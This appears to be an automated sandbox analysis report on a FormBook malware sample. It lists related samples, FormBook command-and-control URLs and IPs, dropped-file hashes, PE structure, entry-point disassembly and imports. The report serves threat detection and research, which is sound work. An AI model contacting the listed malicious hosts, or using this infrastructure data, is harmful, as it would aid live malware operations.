162.0.213.94 | invoice.exe | malicious | FormBook | www.syvra.xyz/h2bb/
162.0.213.94 | r9856_7.exe | malicious | FormBook | www.zimra.xyz/knrh/
162.0.213.94 | PO#86637.exe | malicious | FormBook | www.syvra.xyz/h2bb/
162.0.213.94 | New Purchase Order.exe | malicious | FormBook | www.kryto.top/09dt/?lt=rbfG5gS9WKSJFi6dUtliAmup1VBkpZqBcQUpaxDzzhML0bBwD+Qj3UGhdh/xQ289mI9ftdcjEJi/URIx5SNFZ5ISx4hWtAA8ETmF0fwXx3j+/89J/je5YeA=&3ry=nj20Xr
217.160.0.113 | DRAFT COPY BL, CI & PL.exe | malicious | FormBook | www.prestigerugz.info/m5si/
217.160.0.113 | Payment-251124.exe | malicious | FormBook | www.prestigerugz.info/m5si/
217.160.0.113 | r98100.TREN.AUTpdf.exe | malicious | FormBook, NSISDropper | www.lessstressmoreprogress.net/mr04/?Z0D0=rvjNexh3zvI53VZUK60PjrTIX1CVATH5ZgWwVgY6EkaNyaLT3yhdToUFTRj6RAPXbKk9&Xv9xe4=R6Ax
217.160.0.113 | Purchase_Order.exe | malicious | FormBook | www.le-riche.fr/i65a/?l6APbZn0=+0bkTaWhYWAVxnCJ2nwVpM/U/2VALoigtFbvSxMYohoxF0aNNQstvpt3f/wi09R94V0cyMZY94rCxAyEavJUVbQqc8cScfvcKQ==&VVcXv=Fzud9r2H_Lzd_B
217.160.0.113 | Updrag.exe | malicious | FormBook, GuLoader | www.le-riche.fr/niku/?7nFlllx=xrumqyiZw2NMGXSTF9hjIkLrOU6nhVxQiFFKzEKgJBV7+VOp5xdEyxF9LjnfDDCimwOB7aDhAwI/GQ5vlF1HZu55hCcgrcQOFQ==&u4=UvZXQxCPphTT6J
217.160.0.113 | Vldigst.exe | malicious | FormBook, GuLoader | www.le-riche.fr/niku/?mPwH=_XpHEd8884gT7RZp&4hiT=xrumqyiZw2NMGXSTF9hjIkLrOU6nhVxQiFFKzEKgJBV7+VOp5xdEyxF9LjnfDDCimwOB7aDhAwI/GQ5vlF1HZu55hCcgrcQOFQ==
217.160.0.113 | t.exe | malicious | FormBook | www.le-riche.fr/niku/?xH=WHAh6h1XT&NPUh=xrumqyiZw2NMGXSTXZhmP1v4YE2H3hdQiFFKzEKgJBV7+VOp5xdEyw59LjnfDDCimwOB7aDhAwI/GQ5vlF18Zvll9TNcqcdgEQ==
23.167.152.41 | Outstanding Invoices Spreadsheet Scan 00495_PDF.exe | malicious | FormBook | www.06753.photo/4i55/
23.167.152.41 | DRAFT COPY BL, CI & PL.exe | malicious | FormBook | www.75178.club/q34f/
23.167.152.41 | A2028041200SD.exe | malicious | FormBook | www.75178.club/a4h7/
23.167.152.41 | Payment-251124.exe | malicious | FormBook | www.75178.club/q34f/
23.167.152.41 | A2028041200SD.exe | malicious | FormBook | www.75178.club/a4h7/

Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.ontherise.top | DRAFT COPY BL, CI & PL.exe | malicious | FormBook | 162.0.213.94
www.prestigerugz.info | DRAFT COPY BL, CI & PL.exe | malicious | FormBook | 217.160.0.113
www.prestigerugz.info | Payment-251124.exe | malicious | FormBook | 217.160.0.113
all.wjscdn.com | DRAFT COPY BL, CI & PL.exe | malicious | FormBook | 154.90.58.209
all.wjscdn.com | New Order.exe | malicious | FormBook | 154.90.35.240
all.wjscdn.com | TNT Express Delivery Consignment AWD 87993766479.vbs | malicious | FormBook | 38.54.112.227
all.wjscdn.com | Payment-251124.exe | malicious | FormBook | 154.205.159.116
all.wjscdn.com | CV Lic H&S Olivetti Renzo.exe | malicious | FormBook | 38.54.112.227
all.wjscdn.com | CV Lic H&S Olivetti Renzo.exe | malicious | FormBook | 154.90.58.209
www.supernutra01.online | DRAFT COPY BL, CI & PL.exe | malicious | FormBook | 172.67.220.36
www.supernutra01.online | PO_1111101161.vbs | malicious | FormBook |
                                                                • 104.21.24.198
                                                                PAYMENT_ADVICE.exeGet hashmaliciousFormBookBrowse
                                                                • 104.21.24.198
                                                                Payment-251124.exeGet hashmaliciousFormBookBrowse
                                                                • 104.21.24.198
                                                                DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                • 104.21.24.198
                                                                CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                • 172.67.220.36
                                                                CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                • 172.67.220.36
                                                                Project Breakdown Doc.exeGet hashmaliciousFormBookBrowse
                                                                • 172.67.220.36
                                                                DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                • 172.67.220.36
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                ONEANDONE-ASBrauerstrasse48DEOutstanding Invoices Spreadsheet Scan 00495_PDF.exeGet hashmaliciousFormBookBrowse
                                                                • 217.160.0.132
                                                                PO2412010.exeGet hashmaliciousFormBookBrowse
                                                                • 77.68.64.45
                                                                tmpCA68.HtM.htmGet hashmaliciousUnknownBrowse
                                                                • 82.223.161.12
                                                                la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                                                • 62.151.165.56
                                                                la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                                • 82.223.135.21
                                                                la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                                • 74.208.219.57
                                                                https://uhu145fc.s3.amazonaws.com/bf63.html?B3E2629E-DF5B-2F28-7322FD910FB23F54Get hashmaliciousPhisherBrowse
                                                                • 82.223.68.99
                                                                ithgreat.docGet hashmaliciousUnknownBrowse
                                                                • 87.106.68.207
                                                                DRAFT COPY BL, CI & PL.exeGet hashmaliciousFormBookBrowse
                                                                • 217.160.0.113
                                                                NEW.RFQ00876.pdf.exeGet hashmaliciousFormBookBrowse
                                                                • 217.160.0.200
                                                                ACPCAJosho.x86.elfGet hashmaliciousUnknownBrowse
                                                                • 162.8.63.18
                                                                hax.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                • 162.64.255.255
                                                                la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                                • 162.49.96.105
                                                                UToB1WBfv0.exeGet hashmaliciousDarkCloudBrowse
                                                                • 162.55.60.2
                                                                AGrsqxaSjd.exeGet hashmaliciousDarkCloudBrowse
                                                                • 162.55.60.2
                                                                Owari.ppc.elfGet hashmaliciousUnknownBrowse
                                                                • 162.1.10.3
                                                                Owari.arm7.elfGet hashmaliciousMiraiBrowse
                                                                • 162.137.25.149
                                                                DRAFT COPY BL, CI & PL.exeGet hashmaliciousFormBookBrowse
                                                                • 162.0.213.94
                                                                MN1qo2qaJmEvXDP.exeGet hashmaliciousFormBookBrowse
                                                                • 162.0.215.33
                                                                jew.mips.elfGet hashmaliciousUnknownBrowse
                                                                • 162.52.78.93
                                                                ESVC-ASNUSOutstanding Invoices Spreadsheet Scan 00495_PDF.exeGet hashmaliciousFormBookBrowse
                                                                • 23.167.152.41
                                                                DRAFT COPY BL, CI & PL.exeGet hashmaliciousFormBookBrowse
                                                                • 23.167.152.41
                                                                lgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                                • 23.167.152.41
                                                                New quotation request.exeGet hashmaliciousFormBookBrowse
                                                                • 23.167.152.41
                                                                A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                • 23.167.152.41
                                                                Payment-251124.exeGet hashmaliciousFormBookBrowse
                                                                • 23.167.152.41
                                                                A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                • 23.167.152.41
                                                                need quotations.exeGet hashmaliciousFormBookBrowse
                                                                • 23.167.152.41
                                                                FSd2UlLC6H.elfGet hashmaliciousUnknownBrowse
                                                                • 23.167.178.53
                                                                1YhXFyiSni.dllGet hashmaliciousWannacryBrowse
                                                                • 23.167.182.84
                                                                No context
                                                                No context
Process: C:\Windows\SysWOW64\tzutil.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category: modified
Size (bytes): 196608
Entropy (8bit): 1.1215420383712111
Encrypted: false
SSDEEP: 384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5: 9A809AD8B1FDDA60760BB6253358A1DB
SHA1: D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256: 95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512: 2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious: false
Reputation: moderate, very likely benign file
Process: C:\Users\user\Desktop\01152-11-12-24.exe
File Type: data
Category: dropped
Size (bytes): 289280
Entropy (8bit): 7.995017874109676
Encrypted: true
SSDEEP: 6144:/d5+fmQRv2S0X7Kzw5fnpYIWd06r9iRPST8iPLlYb8V9J4ki+:/+YtXEwBqUfRPST8mJs8VHJJ
MD5: 6AD764965EF2E37476698F818C4A80DE
SHA1: 8B7045D468CD4BBA413BAF13DC12F5D2D8A23179
SHA-256: 5CC75DA4A017175340EC2EBBE010DD3F6D7F79E2380E2ADD135298270A9C3849
SHA-512: 1DA5CFD4F03D56DD6F54F96BEBAA3DCE438BC129EB504EE1C61BDBEFC60B8FAD1DA84E6D626A5734489728E3100125B466C173C798E18EBC999B27E3AE49F96E
Malicious: false
Reputation: low
Process: C:\Users\user\Desktop\01152-11-12-24.exe
File Type: data
Category: modified
Size (bytes): 289280
Entropy (8bit): 7.995017874109676
Encrypted: true
SSDEEP: 6144:/d5+fmQRv2S0X7Kzw5fnpYIWd06r9iRPST8iPLlYb8V9J4ki+:/+YtXEwBqUfRPST8mJs8VHJJ
MD5: 6AD764965EF2E37476698F818C4A80DE
SHA1: 8B7045D468CD4BBA413BAF13DC12F5D2D8A23179
SHA-256: 5CC75DA4A017175340EC2EBBE010DD3F6D7F79E2380E2ADD135298270A9C3849
SHA-512: 1DA5CFD4F03D56DD6F54F96BEBAA3DCE438BC129EB504EE1C61BDBEFC60B8FAD1DA84E6D626A5734489728E3100125B466C173C798E18EBC999B27E3AE49F96E
Malicious: false
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.211252733579842
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: 01152-11-12-24.exe
File size: 1'229'312 bytes
MD5: be474451d52ccc6038809f5308effb59
SHA1: 0caf3ee11e31cc873aa5086ae58a8b0b90cf94b3
SHA256: c277a0bbd4efe9b14a4c880ac91b1ab7d0769ad013e67079bad402f56e260a60
SHA512: d3a259916401baf76099da3004967993b60b3c3b2eca6985fdfb3537ba178f6300e713f4bc7997f00f17f1c46c06dc4cce41310e3482c311d4d2668dfd3e411d
SSDEEP: 24576:Su6J33O0c+JY5UZ+XC0kGso6Fam0K+8/H33hkDpWY:Uu0c++OCvkGs9Fam0K+8f3WYY
TLSH: E145CF2273DDC360CB669173BF6AB7016EBF3C214A30B95B1F980D7DA950162162D7A3
Icon Hash: aaf3e3e3938382a0
Entrypoint: 0x427dcd
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x675912B7 [Wed Dec 11 04:19:03 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: afcdf79be1557326c854b6e20cb900a7
                                                                Instruction
                                                                call 00007F5260B57EBAh
                                                                jmp 00007F5260B4AC84h
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                push edi
                                                                push esi
                                                                mov esi, dword ptr [esp+10h]
                                                                mov ecx, dword ptr [esp+14h]
                                                                mov edi, dword ptr [esp+0Ch]
                                                                mov eax, ecx
                                                                mov edx, ecx
                                                                add eax, esi
                                                                cmp edi, esi
                                                                jbe 00007F5260B4AE0Ah
                                                                cmp edi, eax
                                                                jc 00007F5260B4B16Eh
                                                                bt dword ptr [004C31FCh], 01h
                                                                jnc 00007F5260B4AE09h
                                                                rep movsb
                                                                jmp 00007F5260B4B11Ch
                                                                cmp ecx, 00000080h
                                                                jc 00007F5260B4AFD4h
                                                                mov eax, edi
                                                                xor eax, esi
                                                                test eax, 0000000Fh
                                                                jne 00007F5260B4AE10h
                                                                bt dword ptr [004BE324h], 01h
                                                                jc 00007F5260B4B2E0h
                                                                bt dword ptr [004C31FCh], 00000000h
                                                                jnc 00007F5260B4AFADh
                                                                test edi, 00000003h
                                                                jne 00007F5260B4AFBEh
                                                                test esi, 00000003h
                                                                jne 00007F5260B4AF9Dh
                                                                bt edi, 02h
                                                                jnc 00007F5260B4AE0Fh
                                                                mov eax, dword ptr [esi]
                                                                sub ecx, 04h
                                                                lea esi, dword ptr [esi+04h]
                                                                mov dword ptr [edi], eax
                                                                lea edi, dword ptr [edi+04h]
                                                                bt edi, 03h
                                                                jnc 00007F5260B4AE13h
                                                                movq xmm1, qword ptr [esi]
                                                                sub ecx, 08h
                                                                lea esi, dword ptr [esi+08h]
                                                                movq qword ptr [edi], xmm1
                                                                lea edi, dword ptr [edi+08h]
                                                                test esi, 00000007h
                                                                je 00007F5260B4AE65h
                                                                bt esi, 03h
                                                                jnc 00007F5260B4AEB8h
                                                                Programming Language:
                                                                • [ASM] VS2013 build 21005
                                                                • [ C ] VS2013 build 21005
                                                                • [C++] VS2013 build 21005
                                                                • [ C ] VS2008 SP1 build 30729
                                                                • [IMP] VS2008 SP1 build 30729
                                                                • [ASM] VS2013 UPD4 build 31101
                                                                • [RES] VS2013 build 21005
                                                                • [LNK] VS2013 UPD4 build 31101
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xba44c          0x17c         .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xc7000          0x638a0       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x12b000         0x711c        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x92bc0          0x1c          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0xa4870          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x8f000          0x884         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name   | Virtual Address | Virtual Size | Raw Size | MD5                              | Xored PE | ZLIB Complexity     | File Type          | Entropy            | Characteristics
.text  | 0x1000          | 0x8dcc4      | 0x8de00  | d28a820a1d9ff26cda02d12b888ba4b4 | False    | 0.5728679102422908  | data               | 6.676118058520316  | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000         | 0x2e10e      | 0x2e200  | 79b14b254506b0dbc8cd0ad67fb70ad9 | False    | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207   | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data  | 0xbe000         | 0x8f74       | 0x5200   | 9f9d6f746f1a415a63de45f8b7983d33 | False    | 0.1017530487804878  | data               | 1.198745897703538  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc  | 0xc7000         | 0x638a0      | 0x63a00  | a203119eec68ec0078c71d9e3e3069d9 | False    | 0.9334320106649937  | data               | 7.9074972013379545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x12b000        | 0x711c       | 0x7200   | 6fcae3cbbf6bfbabf5ec5bbe7cf612c3 | False    | 0.7650767543859649  | data               | 6.779031650454199  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name          | RVA      | Size    | Type                                                                               | Language | Country       | ZLIB Complexity
RT_ICON       | 0xc75a8  | 0x128   | Device independent bitmap graphic, 16 x 32 x 4, image size 192                     | English  | Great Britain | 0.7466216216216216
RT_ICON       | 0xc76d0  | 0x128   | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English  | Great Britain | 0.3277027027027027
RT_ICON       | 0xc77f8  | 0x128   | Device independent bitmap graphic, 16 x 32 x 4, image size 192                     | English  | Great Britain | 0.3885135135135135
RT_ICON       | 0xc7920  | 0x2e8   | Device independent bitmap graphic, 32 x 64 x 4, image size 0                       | English  | Great Britain | 0.3333333333333333
RT_ICON       | 0xc7c08  | 0x128   | Device independent bitmap graphic, 16 x 32 x 4, image size 0                       | English  | Great Britain | 0.5
RT_ICON       | 0xc7d30  | 0xea8   | Device independent bitmap graphic, 48 x 96 x 8, image size 0                       | English  | Great Britain | 0.2835820895522388
RT_ICON       | 0xc8bd8  | 0x8a8   | Device independent bitmap graphic, 32 x 64 x 8, image size 0                       | English  | Great Britain | 0.37906137184115524
RT_ICON       | 0xc9480  | 0x568   | Device independent bitmap graphic, 16 x 32 x 8, image size 0                       | English  | Great Britain | 0.23699421965317918
RT_ICON       | 0xc99e8  | 0x25a8  | Device independent bitmap graphic, 48 x 96 x 32, image size 0                      | English  | Great Britain | 0.13858921161825727
RT_ICON       | 0xcbf90  | 0x10a8  | Device independent bitmap graphic, 32 x 64 x 32, image size 0                      | English  | Great Britain | 0.25070356472795496
RT_ICON       | 0xcd038  | 0x468   | Device independent bitmap graphic, 16 x 32 x 32, image size 0                      | English  | Great Britain | 0.3173758865248227
RT_MENU       | 0xcd4a0  | 0x50    | data                                                                               | English  | Great Britain | 0.9
RT_STRING     | 0xcd4f0  | 0x594   | data                                                                               | English  | Great Britain | 0.3333333333333333
RT_STRING     | 0xcda84  | 0x68a   | data                                                                               | English  | Great Britain | 0.2747909199522103
RT_STRING     | 0xce110  | 0x490   | data                                                                               | English  | Great Britain | 0.3715753424657534
RT_STRING     | 0xce5a0  | 0x5fc   | data                                                                               | English  | Great Britain | 0.3087467362924282
RT_STRING     | 0xceb9c  | 0x65c   | data                                                                               | English  | Great Britain | 0.34336609336609336
RT_STRING     | 0xcf1f8  | 0x466   | data                                                                               | English  | Great Britain | 0.3605683836589698
RT_STRING     | 0xcf660  | 0x158   | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0                   | English  | Great Britain | 0.502906976744186
RT_RCDATA     | 0xcf7b8  | 0x5ab67 | data                                                                               |          |               | 1.000325654875807
RT_GROUP_ICON | 0x12a320 | 0x76    | data                                                                               | English  | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x12a398 | 0x14    | data                                                                               | English  | Great Britain | 1.25
RT_GROUP_ICON | 0x12a3ac | 0x14    | data                                                                               | English  | Great Britain | 1.15
RT_GROUP_ICON | 0x12a3c0 | 0x14    | data                                                                               | English  | Great Britain | 1.25
RT_VERSION    | 0x12a3d4 | 0xdc    | data                                                                               | English  | Great Britain | 0.6181818181818182
RT_MANIFEST   | 0x12a4b0 | 0x3ef   | ASCII text, with CRLF line terminators                                             | English  | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
